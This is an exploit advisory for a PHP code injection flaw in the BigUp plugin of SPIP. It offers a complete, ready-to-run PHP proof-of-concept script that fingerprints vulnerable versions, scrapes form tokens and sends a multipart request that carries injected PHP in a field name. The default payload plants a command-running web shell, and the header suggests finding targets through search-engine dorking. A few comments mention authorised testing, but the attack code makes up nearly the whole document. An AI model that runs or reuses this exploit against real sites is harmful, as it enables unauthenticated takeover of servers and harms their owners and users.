`=============================================================================================================================================
| # Title : SPIP BigUp 4.2.15 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.spip.net/ |
=============================================================================================================================================
poc :
[+] Find targets by dorking in Google or another search engine (only assess hosts you are authorised to test).
[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.
The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.
The plugin mishandles the multipart form data of a file upload: the PoC below places PHP code in the `name` attribute of the uploaded file part, and that name is reused unsanitised on the server, so an attacker can inject and execute arbitrary PHP code.
It allows unauthenticated users to execute arbitrary code remotely via the public interface.
[+] Set your target & payload where the script instantiates `indoushka` (the usage example at the end of the listing).
[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php
[+] Payload :
<?php
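class indoushka {
    /** Inclusive [low, high] SPIP version ranges listed as affected by this advisory. */
    const VULNERABLE_RANGES = [
        ['4.0.0', '4.1.17'],
        ['4.2.0', '4.2.15'],
        ['4.3.0', '4.3.1'],
    ];

    /** @var string Base URL of the target SPIP install, e.g. https://host/ */
    private $targetUri;
    /** @var string Page whose form supplies formulaire_action / formulaire_action_args, or 'auto' to probe a list */
    private $formPage;
    /** @var string PHP source that is injected into the file part's field name */
    private $payload;
    /** @var string|null|false Cached fingerprint result; false means "not probed yet" */
    private $detectedVersion = false;

    /**
     * @param string $targetUri base URL of the target site
     * @param string $formPage  page name holding a SPIP form, or 'auto'
     * @param string $payload   PHP code to run on the target
     * @throws InvalidArgumentException when the target or the payload is empty
     */
    public function __construct($targetUri, $formPage = 'auto', $payload = '') {
        // $payload keeps its position but gets a default: an optional parameter before a
        // required one is deprecated since PHP 8.0, so emptiness is validated here instead.
        if ((string) $targetUri === '' || (string) $payload === '') {
            throw new InvalidArgumentException('targetUri and payload must be non-empty');
        }
        $this->targetUri = (string) $targetUri;
        $this->formPage = ((string) $formPage === '') ? 'auto' : (string) $formPage;
        $this->payload = (string) $payload;
    }

    /**
     * Whether a SPIP version string lies in one of VULNERABLE_RANGES (inclusive).
     *
     * @param string $version dotted version, e.g. "4.2.15"
     * @return bool
     */
    public static function isVersionVulnerable($version) {
        foreach (self::VULNERABLE_RANGES as $range) {
            list($low, $high) = $range;
            if (version_compare($version, $low, '>=') && version_compare($version, $high, '<=')) {
                return true;
            }
        }
        return false;
    }

    /**
     * Extract the SPIP version advertised by an HTTP response.
     *
     * NOTE(review): a default SPIP install announces itself in a
     * `Composed-By: SPIP x.y.z ...` response header and in a
     * `<meta name="generator" content="SPIP x.y.z">` tag; hardened sites may strip
     * both. Confirm on the target; null is returned when neither marker is present.
     *
     * @param string $headers raw response headers
     * @param string $body    response body (HTML)
     * @return string|null
     */
    public static function parseSpipVersion($headers, $body) {
        if (preg_match('/^Composed-By:\s*SPIP\s+(\d+(?:\.\d+)*)/mi', (string) $headers, $m)) {
            return $m[1];
        }
        if (preg_match('/<meta\s+name=["\']generator["\']\s+content=["\']SPIP\s+(\d+(?:\.\d+)*)/i', (string) $body, $m)) {
            return $m[1];
        }
        return null;
    }

    /**
     * Map of input name => value for every <input> in an HTML document (first wins).
     * Looking inputs up by name replaces the original positional item(0)/item(1)
     * lookup, which silently picked the wrong fields on any page whose form started
     * with other inputs.
     *
     * @param string $html
     * @return array<string,string>
     */
    public static function extractInputValues($html) {
        $html = (string) $html;
        if ($html === '') {
            return []; // DOMDocument::loadHTML rejects an empty string
        }
        $previous = libxml_use_internal_errors(true); // SPIP pages are not always well-formed
        $doc = new DOMDocument();
        $doc->loadHTML($html);
        libxml_clear_errors();
        libxml_use_internal_errors($previous);
        $fields = [];
        foreach ($doc->getElementsByTagName('input') as $input) {
            $name = $input->getAttribute('name');
            if ($name !== '' && !isset($fields[$name])) {
                $fields[$name] = $input->getAttribute('value');
            }
        }
        return $fields;
    }

    /**
     * Boundary of a multipart body: everything after the leading "--" on its first line.
     * The original used substr($data, 2, 32), which truncated the 54-character boundary
     * built in exploit(), so the Content-Type header never matched the body and the
     * server could not parse the upload at all.
     *
     * @param string $data multipart body starting with "--<boundary>\r\n"
     * @return string
     */
    public static function boundaryOf($data) {
        $data = (string) $data;
        $eol = strpos($data, "\r\n");
        $firstLine = ($eol === false) ? $data : substr($data, 0, $eol);
        return (string) substr($firstLine, 2);
    }

    /**
     * Fingerprint the target and report whether its version is in an affected range.
     * The verdict stays a string for the existing caller; use isVulnerable() for a bool.
     *
     * @return string human-readable verdict
     */
    public function check() {
        $spipVersion = $this->getSpipVersion();
        if ($spipVersion === null) {
            return "Unable to determine the version of SPIP.";
        }
        echo "SPIP Version detected: " . $spipVersion . "\n";
        if (!self::isVersionVulnerable($spipVersion)) {
            return "The detected SPIP version ($spipVersion) is not vulnerable.";
        }
        echo "SPIP version $spipVersion is vulnerable.\n";
        return "SPIP version $spipVersion is vulnerable.";
    }

    /**
     * True only when a version was detected and it is in an affected range.
     *
     * @return bool
     */
    public function isVulnerable() {
        $version = $this->getSpipVersion();
        return $version !== null && self::isVersionVulnerable($version);
    }

    /**
     * Probe the site root once and cache the advertised version.
     * The original stub returned a constant '4.3.1', so check() reported every host
     * as vulnerable and the payload was fired blindly.
     *
     * @return string|null
     */
    private function getSpipVersion() {
        if ($this->detectedVersion === false) {
            $response = $this->sendRequest('GET', $this->normalizeUri(''));
            $this->detectedVersion = ($response['status'] > 0)
                ? self::parseSpipVersion($response['headers'], $response['body'])
                : null;
        }
        return $this->detectedVersion;
    }

    /**
     * Fetch the hidden form tokens SPIP expects with every form post.
     *
     * @return array{action:string,args:string}|null null when no probed page carried both
     */
    private function getFormData() {
        $pages = ($this->formPage !== 'auto') ? [$this->formPage] : ['login', 'spip_pass', 'contact'];
        foreach ($pages as $page) {
            $response = $this->sendRequest('GET', $this->normalizeUri($page));
            if ($response['status'] !== 200 || $response['body'] === '') {
                continue;
            }
            $fields = self::extractInputValues($response['body']);
            $action = isset($fields['formulaire_action']) ? $fields['formulaire_action'] : '';
            $args = isset($fields['formulaire_action_args']) ? $fields['formulaire_action_args'] : '';
            if ($action !== '' && $args !== '') {
                echo "Found formulaire_action: $action\n";
                echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";
                return ['action' => $action, 'args' => $args];
            }
        }
        return null;
    }

    /**
     * Join the base URL and a page path with exactly one slash between them.
     *
     * @param string $page
     * @return string
     */
    private function normalizeUri($page) {
        return rtrim($this->targetUri, '/') . '/' . ltrim((string) $page, '/');
    }

    /**
     * Issue a GET or multipart POST and return status, raw headers and body.
     * A transport failure yields status 0 and empty strings instead of `false`.
     *
     * @param string      $method 'GET' or 'POST'
     * @param string      $url
     * @param string|null $data   multipart body for POST
     * @return array{status:int,headers:string,body:string}
     */
    private function sendRequest($method, $url, $data = null) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);          // headers are needed for version fingerprinting
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);    // the original had no timeout and hung on dead hosts
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        if ($method === 'POST' && $data !== null && $data !== '') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_HTTPHEADER, [
                'Content-Type: multipart/form-data; boundary=' . self::boundaryOf($data),
            ]);
        }
        $raw = curl_exec($ch);
        if ($raw === false) {
            curl_close($ch);
            return ['status' => 0, 'headers' => '', 'body' => ''];
        }
        $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $headerSize = (int) curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        curl_close($ch);
        return [
            'status' => $status,
            'headers' => (string) substr($raw, 0, $headerSize),
            'body' => (string) substr($raw, $headerSize),
        ];
    }

    /**
     * Base64 of the payload, so it survives inside a single-quoted PHP string literal.
     *
     * @return string
     */
    private function encodePayload() {
        return base64_encode($this->payload);
    }

    /**
     * One multipart part: boundary line, disposition line, blank line, value, CRLF.
     *
     * @param string $boundary
     * @param string $disposition full Content-Disposition header value
     * @param string $value       part body ('' for the empty file part)
     * @return string
     */
    private static function multipartPart($boundary, $disposition, $value) {
        return "--$boundary\r\n" . 'Content-Disposition: ' . $disposition . "\r\n\r\n" . $value . "\r\n";
    }

    /**
     * Build and send the multipart request that reaches lister_fichiers_par_champs.
     * Refuses to fire unless the target fingerprints as an affected version, so the
     * payload is not thrown at unknown or patched hosts.
     *
     * @param bool $force send even when the version check fails
     * @return void
     */
    public function exploit($force = false) {
        if (!$force && !$this->isVulnerable()) {
            echo "Target version not detected as vulnerable; pass force=true to send anyway.\n";
            return;
        }
        $formData = $this->getFormData();
        if (!$formData) {
            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";
            return;
        }
        echo "Preparing to send exploit payload to the target...\n";
        $encodedPayload = $this->encodePayload();
        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
        // The injected PHP lives in the file part's field name; the part body itself is empty.
        $injectedName = $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]';
        $postData = self::multipartPart($boundary, 'form-data; name="formulaire_action"', $formData['action'])
            . self::multipartPart($boundary, 'form-data; name="bigup_retrouver_fichiers"', $this->randomString())
            . self::multipartPart($boundary, 'form-data; name="' . $injectedName . '"; filename="' . $this->randomString() . '"', '')
            . self::multipartPart($boundary, 'form-data; name="formulaire_action_args"', $formData['args'])
            . "--$boundary--\r\n";
        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);
    }

    /**
     * Random lowercase hex string of exactly $length characters.
     * random_bytes($length / 2) in the original passed a float for odd lengths.
     *
     * @param int $length
     * @return string
     */
    private function randomString($length = 8) {
        $length = max(1, (int) $length);
        $bytes = random_bytes(intdiv($length + 1, 2));
        return substr(bin2hex($bytes), 0, $length);
    }
}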
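// Usage: php poc.php <target-base-url> [form-page|auto] [php-payload]
// The target is taken from the command line so the script is never shipped pointing at a
// live third-party host; run it only against systems you are authorised to test.
if (PHP_SAPI !== 'cli' || !isset($argv[1]) || $argv[1] === '') {
    fwrite(STDERR, "Usage: php poc.php <target-base-url> [form-page|auto] [php-payload]\n");
    exit(1);
}
$targetUri = $argv[1];
$formPage = (isset($argv[2]) && $argv[2] !== '') ? $argv[2] : 'auto';
// Default payload: a minimal web shell that runs the command passed in ?cmd=...
$payload = isset($argv[3]) ? $argv[3] : '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
$exploit = new indoushka($targetUri, $formPage, $payload);
// check() reports a sentence rather than a bool; gate on the affirmative wording so the
// payload is not fired at a host whose version is unknown or outside the affected ranges
// (the original discarded the verdict and exploited unconditionally).
$verdict = $exploit->check();
if (strpos($verdict, 'is vulnerable.') === false) {
    fwrite(STDERR, $verdict . "\n");
    exit(2);
}
$exploit->exploit();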
?>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`